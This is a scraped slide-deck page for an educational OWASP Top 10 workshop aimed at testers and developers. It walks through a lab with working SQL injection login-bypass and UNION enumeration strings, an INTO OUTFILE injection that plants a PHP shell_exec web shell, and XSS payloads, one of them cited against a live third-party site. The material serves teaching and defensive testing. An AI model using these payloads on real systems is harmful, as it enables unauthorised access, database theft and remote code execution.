Java Application Development Vulnerabilities
 
Developing Secure Applications and Defending Against Common Attacks
Developing Secure Applications and Defending Against Common AttacksDeveloping Secure Applications and Defending Against Common Attacks
Developing Secure Applications and Defending Against Common Attacks
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015
 
OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE
 
Cyber crime an eye opener 144 te 2 t-7
Cyber crime an eye opener  144 te 2 t-7Cyber crime an eye opener  144 te 2 t-7
Cyber crime an eye opener 144 te 2 t-7
 
Application Security on a Dime: A Practical Guide to Using Functional Open So...
Application Security on a Dime: A Practical Guide to Using Functional Open So...Application Security on a Dime: A Practical Guide to Using Functional Open So...
Application Security on a Dime: A Practical Guide to Using Functional Open So...
 

Recently uploaded

04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAndikSusilo4
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 

Recently uploaded (20)

04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Key Features Of Token Development (1).pptx
Key  Features Of Token  Development (1).pptxKey  Features Of Token  Development (1).pptx
Key Features Of Token Development (1).pptx
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & Application
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 

Owasp top 10 web application security hazards - Part 1

  • 1.   TOP 10 WEB APPLICATION SECURITY HAZARDS @   by Abhinav Sejpal Null - Humla Session
  • 2. THOUGHT WORKS - BANGALORE
  • 3.         WHO AM I I' m Next-Gen Exploratory Testy  Student of Information Security field Researcher & Reader in free time Member of Crowd Tester (AKA. Bug bounty Hunter)   Proficient at Functional, Usability , Accessibility & Compatibility Testing Love to develop nasty code  & Hack it :) Works as Quality Analyst at AKA. Bug Wrangler Null Open Security Co mmunity passbrains.com
  • 4. DISCLAIMER This presentation is intended for educational purpose only and I cannot be held liable for any kind of damages done, whatsoever to your machine, or any other damages.   Don't try this attack on any other system without having context knowledge or permission, this may harm someone directly or indirectly. Feel free to use this presentation for practice or education purpose. ^ I hope - You gotcha ^
  • 5. ~ WE AREN'T GOING TO DO THIS ~ So, feel free to stop when you have a doubt!  Are you Ready to Rock ???
  • 6. AGENDA  Why Web Application Security Testing ?  Myths, you'll hear - but Do you believe ?  What is OWASP, what do they provide ?    OWASP Web Top - 10 Publication  How web works ?  Proof of Concept  for Top - 10 attack   Self exploratory exercise on Top - 10  Learn + Hack     Q  &  A
  • 7.    FOR SOCIAL MEDIA Twitter handle   @  @null0x00 Abhinav_Sejpal Hashtag for this session      # #Nullhumla nullblr
  • 8. HUMLA MEANS 'ATTACK' IN HINDI                         
  • 9.  
  • 10.    
  • 11.
  • 12.
  • 13. OBJECTIVES FOR THIS SESSION BUILD SECURITY AWARENESS FOR WEB APPLICATION GET TO KNOW ATTACK METHOD OF HACKERS LEARN WAY TO DISCOVER SECURITY VULNERABILITIES LEARN BASIC OF SECURE WEB APPLICATION VIA OWASP TOP 10
  • 14. WHY WEB APPLICATION SECURITY TESTING?
  • 15. HERE IS THE ANSWER ! Increases vulnerability to attacks Damage to your reputation and brand value Loss of customer confidence & potential business Disturbance to your online means of revenue collection Legal liability Website downtime, loss of time & resources in mitigating the damage Additional costs and regression testing associated with securing web applications for future attacks And much more! Boom - Isn't it? The average loss reported in the 2007 CSI Computer Crime and Security Survey was $350,424.
  • 17. MYTHS, YOU'LL HEAR - BUT DO YOU BELIEVE?
  • 18. DON'T BELIEVE IN MYTHS! Secure Socket Layer (SSL / HTTPS) protects my website. Buy this one tool and it will solve all my problems. We don’t have anything worth to be stolen. {Java - Insert Name here} is a secured language. We can't possibly be a target. We never had any data breaches on our organization and we are safe. Our technical team is much smart.  #facepalm We have a firewall setup (WAF) - Nothing to worry! You wish  You're safer on a mobile site as compared to a desktop. Can come up with umpteen more!
  • 19. SO, DO YOU ALL AGREE  THAT WEB APPLICATION SECURITY IS ESSENTIAL?  
  • 20. MY OPINION   SECURITY TESTING IS ALWAYS A RACE BETWEEN HACKERS AND THE SECURITY COMPANIES TO GET ONE STEP AHEAD OF EACH OTHER.
  • 21.  RISK MANAGEMENT  THE WEB WILL NEVER BE 100 PER CENT SECURE, BUT WITH GOOD DUE DILIGENCE, IT CAN BE ONE OF THE SAFEST PLACES ON EARTH TO DO BUSINESS.  AFTER ALL, OUR PRIMARY CONCERN IS SEAMLESS BUSINESS. There we stand ^ Web application Security Ninja's ^
  • 22. :D WHAT IS OWASP? O verly Wonderful Awesome Super People !
  • 23. OWASP -THE OPEN WEB APPLICATION SECURITY PROJECT (OWASP) is a 501c3 not for-profit worldwide charitable organization Everyone is free to participate in OWASP and all the materials are available under a free and open software license It provides a free access to community resources and events:  Publications, Articles  Standard  Testing and Training Software  Local Chapters & Mailings List  World-wide conferences 
  • 24. OWASP ROLE Make application security visible, so that people and organizations can make informed decisions about true application security risk!
  • 25. What do we mean by OWASP  Top 10 Web Application Security Vulnerabilities ? A list of the 10 most severe security issues f requently occur in web applications. It’s a list of vulnerabilities that require immediate remediation. Existing code should be checked for these vulnerabilities, as these flaws are effectively targeted by attackers. New updates on tithe year (third year sequence).  Strong push to present as a standard
  • 26. Are we sure that this survey results are trustworthy ? This wiki is not a standard or a policy. It provides a brief description of the vulnerabilities, and methods of This is nothing but   Top ten web application security hazards recommended by OWASP Survey. ^ Myth Involved Here^
  • 27. prevention. LET'S BEGIN OUR JOURNEY OF  TOP 10 WEB APPLICATION SECURITY HAZARDS  I don't want to showcase top ten - let's start with baby steps 
  • 31.
  • 32. I have questions? Does the user input go through any validation at user’s web browser? Does Business Logic verify the user inputs at server side?   If your answer is 'No', then be ready for the 'Nightmare'
  • 33. Conclusion Modern websites rely on user input for everything. They are basically applications which expect various kinds of inputs coming from users to function a certain way.   ~ Courtesy   ~@makash
  • 34. Could be Command / SQL statement  I AM THAT BAD INPUT 'INJECTION '  OWASP #A1
  • 35. WHAT IS SQL ? SQL stands for Structured Query Language. Execute queries against a database Retrieve data from a database Insert new records in a database Delete records from a database In short, All DB operations :)
  • 37. WHAT IF THIS WORKS? UMM
  • 38. IT'S ME - SQL INJECTION PEOPLE CALL ME SQLI ALSO 'YES' - I AM A BOTTLENECK FOR DEVELOPERS SINCE MANY YEARS Smart Geeks opt for me along with user inputs &  perform attack.                
  • 39. PREVIOUS ATTACKS VIA SQLI  SQL injection has been responsible for 83% of all successful hacking-related data breaches, from 2005-2011. (Source: Privacyrights.org) Automation Infects 100,000s: In 2008, SQLi attacks became automated via the use of botnets. Mass website infection incidents include 500,000 reported in 2008; 210,000 in 2009; 500,000 in 2010 and 380,000 in 2011.
  • 40. SQLI FACTS Dominant Source of Attack: 97 percent of data breaches worldwide are due to SQL injection. (Source: National Fraud Authority UK) Web Application Risk: SQL Injection was the leading Web application risk of 2011. It ranks as one of the most common software vulnerabilities in survey after survey(Source: Trustwave)
  • 41. CAKE PHP Struts 2 Spring  GWT (Google Web toolkit) MYTHS SQLi is old days' problem - I shouldn't worry about this. ^^ I am using Java / PHP / RUBY / ASP modern days' framework.
  • 42. ESAPI
  • 43. Latest SQL Injection Campaign Infects 1 Million Web Pages
  • 44. Yahoo Hit By SQL Injection Attack
  • 45. SQL INJECTION FLAW IN WALL STREET JOURNAL DATABASE LED TO BREACH
  • 46. SQL INJECTION ISN'T GOING ANY WHERE  <3
  • 47. for: Setup the Test Lab Install XAMPP Acronym X (to be read as "cross", meaning )cross-platform Apache HTTP Server MySQL PHP Perl
  • 48. TARGETED APPLICATION Client Side language : HTML & Javascript Server side Language: PHP DB : MYSQL  Why PHP ?  - Any answer Here? Why MySQL?  MySQL is  Girlfriend of PHP <3 
  • 49. PHP IS USED BY 82.2% OF ALL THE WEBSITES AS SERVER-SIDE PROGRAMMING LANGUAGE. http://w3techs.com/technologies/overview/programming_lang
  • 50. PHP: 244M SITES 2.1M IP ADDRESSES
  • 51. 2013 Server-side Programming Language of the Year Don't Mind Power of PHP > Facebook & yahoo  http://w3techs.com/blog/entry/web_technologies_of_the_year
  • 53. CONCEPT Basic SQL query Login page :- SELECT * FROM users where username="username" AND password = "pass" Basic PHP statement for Login page :- SELECT * FROM users where username='".$username."' AND password = '".md5($pass)."'"   *Md5() method is used to encrypt the password.        * Demo at SQL *
  • 54. CHEAT SHEET #Attack  - 1 SELECT * FROM `users` WHERE `username` ='admin' or '1'='1' and password ='I dont know' Injection code :- admin' or '1'='1
  • 55. WHY ? Attack 1 is rely on 'User name' SELECT * FROM `users` WHERE `username` =' admin' or '1'='1 ' and password ='I dont know' Can't perform this attack on password field due to encryption. User name = anything' or '1' ='1 password = anything' or '1'='1
  • 56. * known User name is mandatory Here*
  • 57. LEARNING FROM THE ATTACK 1 User name is known i.e. 'admin'  Append SQL statement with user name   <It simply works> But you can't perform this attack without user name
  • 58.
  • 59. COMMENTS BASED SQLI http://dev.mysql.com/doc/refman/5.1/en/comments.html # : Single line comment "-- " : Sequence to end of line comment /*  Sequence to following block comment*/
  • 60. CONCEPT Basic SQL query Login page :- SELECT * FROM users where username="username" AND password = "pass" What if  - I insert comments in first attack SELECT * FROM users where username=" admin" or '1' ='1' # AND password = "pass" << AND password = " pass" >> doesn't execute all
  • 61. IF YOU GET ME - ATTACK DOESN'T REQUIRE USER NAME NOW  SELECT * FROM users where username=" admin" or '1' ='1' # AND password = "pass" SQL statement will be always true due  '1' = '1'  thus doesn't matter, you are knowing user name or not. Yes - I am done. but what if ' #' is not valid input?
  • 62. (-- ) WORKS FOR YOU BUDDY! * --(space) is syntax  admin' or '1' = '1' --: False  admin' or '1' = '1' --  : True Mostly people forget to add space, so I use below vector admin' or '1' = '1' -- space + any one character E.G. > admin' or '1' = '1' -- Sandy
  • 63. SO, WHAT DO YOU THINK, SQL IS ALL ABOUT   1=1?  ssshhh - Do you hear that? - NO
  • 64. DUMP SENSITIVE DB INFO * Identify column gets selected. * Identify the data set which value will be displayed. a%' union select 1,2,3,4,5 from users # a%' union select 1 ,@@datadir,2,3,4 from users # a%' union select 1 ,@@version,3,4,5 from users #
  • 65. DATABASE ENUMERATION   a%' union select 1, table_schema,2,3,4 from information_schema.tables  #
  • 66. TABLE ENUMERATION a%' union select 1, table_schema, table_name,3,4 from information_schema.tables  # a%' union select 1, table_schema, table_name,3,4 from information_schema.tables  where table_schema='sqlhumla'#
  • 67.  - Text File Writing SHELL INJECTION Into outfile  I want to save a MySQL query result to a text file like this: <span class="kwd">SELECT</span> <span class="pln"></span> <span class="pun">*</span> <span class="pln"></span> <span class="kwd">FROM</span> <span class="pln"> orders </span> <span class="kwd">INTO</span> <span class="pln"> OUTFILE </span> <span class="str">'/data.txt'</span>
  • 68. Can we append the same logic with our injection? user=frodo' into outfile 'test.txt'; -- comments
  • 69. SHELL INJECTION 'Hello world' PHP File Writing at current folder =FRODO' INTO OUTFILE "../../HTDOCS/XAMPP/SQLI/TEST.TXT"; - A Select * from users where username = 'frodo' union select 1,2,3," <?php  echo "Hello World"; ?> ",5 from users into outfile '../../htdocs/xampp/sqli/ shellTest.php';  -- a
  • 70. PHP SHELL CODE <?php $output = shell_exec('Test'); echo '<pre>$output</pre>'; ?> Append the same as SQL injection user=frodo' union select 1,2,3, " <?php $output = shell_exec('test'); echo '<pre>$output</pre>'; ?>", 5 from users into outfile '../../htdocs/xampp/sqli/shell.php';  -- a
  • 72. PLAY GROUND DAMN VULNERABLE WEB APP Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment. http://www.dvwa.co.uk/ https://github.com/RandomStorm/DVWA
  • 76. BAD CODE WITH SUBSTITUTIONS
  • 77. AUTOMATION TOOLS / FRAMEWORK FOR POC Metasploit SQL MAP Havij Sql inject Me(add-on) Burp suit  SQL Inject  or many....!
  • 78. XXS CROSS-SITE SCRIPTING "XSS enables attackers to inject client-side script into web pages viewed by other users". OWASP #A3 Wikipedia says
  • 79. WHAT IS XSS ? http://appsandsecurity.blogsplot.de/2012/11/is-xss-solved.html OWASP says "Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
  • 80. SO WHERE DOES XSS STAND? ACCORDING TO WHITE HAT,  53% WEB APPLICATIONS HAVE XSS VULNERABILITY.  https://www.whitehatsec.com/assets/WPstatsReport_052013.p
  • 81. DO YOU KNOW, 81 OUT OF 100 POPULAR MOBILE WEBSITES ARE VULNERABLE TO XSS? http://www.nds.rub.de/media/nds/veroeffentlichungen/2013/08
  • 82. STATS FROM GOOGLE'S VULNERABILITY REWARD PROGRAM http://www.nilsjuenemann.de/2012/12/news-about- googles-vulnerability-reward.html
  • 83. INPUT - OUTPUT CONTEXT
  • 86. LIFE CYCLE OF REFLECTED XSS
  • 87. AND I'M YOUR XSS! </script> <script> confirm(1); </script>
  • 90. (AKA NON-PERSISTENT)REFLECTED XSS Reflected XSS occurs when user input is immediately returned by a web application in an error message, search result, or any other response that includes some or all of the input provided by the user as part of the request, without that data being made safe to render in the browser, and without permanently storing the user provided data. https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting
  • 91. CAN WE SAVE JS CODE IN DB? What if so ? :D      
  • 92. LIFE CYCLE OF STORED XSS
  • 93.  I T IS STORED XSS Live  http://mmqb.si.com/2014/08/20/san-francisco-49ers-new-stadium-training-camp-thoughts- peter-king-video/#mmqb_livefyre_comm_bellow/autostart/ Vector :  Under BIO :- </p></script> <img src=1 onerror=alert(document.cookie);>
  • 94. STORED XSS Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application.
  • 95. #XSS WRITE-UP BY ASHAR http://www.scribd.com/doc/210121412/XSS-is-not-going- anywhere
  • 96. OH NO, THERE IS AN XSS IN YOUR JS http://127.0.0.1/xampp/DOM%20XSS/domxss_demo_1.html# <img src=nonexistent onerror=alert(1)>
  • 97. IT'S DOM BASED XSS Directory Object Model
  • 98. Understand the Logic When Source gets synced?    An attacker may append a JS to the affected page URL which would, when executed, display the alert box. Impact would show only on - Client side JS
  • 99.  IF YOU WANT TO KNOW MORE ABOUT DOM BASED XSS THEN  PLEASE BUG " "@LAVAKUMARK More Info at : https://ironwasp.org/
  • 100. <shhh - Very low priority but should be acknowledged > NO MORE TALK ABOUT SELF XSS
  • 101. But there is a lot to learn :D
  • 102. Am I Vulnerable To 'Broken Authentication   & Session Management'? A2 - OWASP TOP 10
  • 103.
  • 104.
  • 105. So, Let's Learn about Web App DB structure Passwords are stored in plain text. oh really  -- ':( OWASP #A6
  • 106. Password is protected, when stored using encryption algorithm.   Are you sure?  http://www.md5online.org/
  • 107. YOU MAY ALSO TRY OUT HASH BUT PASSWORD SALT IS A RECOMMENDED SOLUTION SO FAR. P ASSWORD POLICY SHOULD BE APPLIED NICELY AND SHOULD NOT BE WEAKER. -- * -- SECURITY & BUSINESS LOGIC SHOULD BE APPLIED FOR CHANGING PASSWORD.  CHANGE PASSWORD DOESN'T ASK FOR CURRENT PASSWORD - LOL 
  • 108.
  • 109. IN-SECURED SESSION-ID Cookies Flag HTTP ONLY  Secure flag would be complimentary 
  • 111. AVOIDING INSECURE DIRECT OBJECT REFERENCES OWASP #A4  
  • 113. Demo  #1 Tamper the ID parameter http://127.0.0.1/xampp/sqli/secondorder_changepass.php
  • 115. MISSING FUNCTION LEVEL ACCESS CONTROL OWASP #A7
  • 121. A6 – Sensitive Data Exposure
  • 124. OWASP #A8 – Avoiding CSRF Flaws
  • 125. CSRF 
  • 126.
  • 131.            if you are planning to host your own server  this talk matters for you  "SECURING A LINUX WEB SERVER IN 10 STEP S" BY   A KASH MAHAJAN  https://www.youtube.com/watch?v=ort9qxzu3h0
  • 132. YES - I'M DONE! Feel free to write me at bug.wrangler at outlook.com
  • 134. WE NEED YOU! Attend Null Meets-up & give presentations. Share your ideas & leanings. Talk to our community champions & gain from leanings. Your feedback helps us to build a good community. Looking forward to your ongoing support. HTTP://NULL.CO.IN/ Say 'Hello' @null0x00
  • 135. - Twitter Folks - @ , @ , @ @ , @ , @     @ ,  #Nullblr Leads & Champions Big thank you to @ ,@   & you All. CREDITS riyazwalikar anantshri makash TroyHunt yog3sharma soaj1664ashar @ MohammedAImran ru94mb @ LAVAKUMARK , @1_NEHA null0x00 JubbaOnJeans
  • 136. THANK YOU!  KEEP THE SECURITY ANTE UP.
  • 137. https://slides.com/abhinavsejpal/top-10-web-application- security-hazards  LICENSE AND COPYRIGHTS Copyrights 2013-2014 Abhinav Sejpal -----   ( CC BY-NC-ND 3.0) Attribution-NonCommercial-NoDerivs 3.0 Unported  Dedicated to my lovely daddy